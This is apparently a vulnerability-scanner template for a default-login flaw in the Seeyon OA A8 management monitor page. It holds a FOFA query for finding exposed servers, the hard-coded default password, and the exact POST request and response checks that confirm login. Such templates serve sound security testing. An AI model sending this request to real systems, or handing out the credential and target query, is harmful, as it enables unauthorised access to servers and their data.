product: 致远OA
vName: 致远OA A8 Management Monitor - Default Login
type: 访问控制
vID: [ ]
level: 3
vDesc: Seeyon OA A8-m has status monitoring page information leakage. Attackers can obtain sensitive information such as website paths and user names for further attacks. Attackers can use this vulnerability to directly enter the application system or management system to conduct system, web page, data tampering and deletion, illegally obtaining system and user data, and may even cause the server to collapse.
version: ''
note: ''
search:
  FOFA: app="致远互联-OA"
protocol: http
link: ''
fix:
  - 建议联系软件厂商进行处理。
model: ''
logic: and
exploit:
  - exp:
      method: post
      path: /seeyon/management/index.jsp
      data: password=WLCCYBD%40SEEYON
    verify:
      logic: and
      check:
        - body:
            value:
              - <title>A8 Management Monitor</title>
              - Connection Pooling
            logic: and
        - status: 200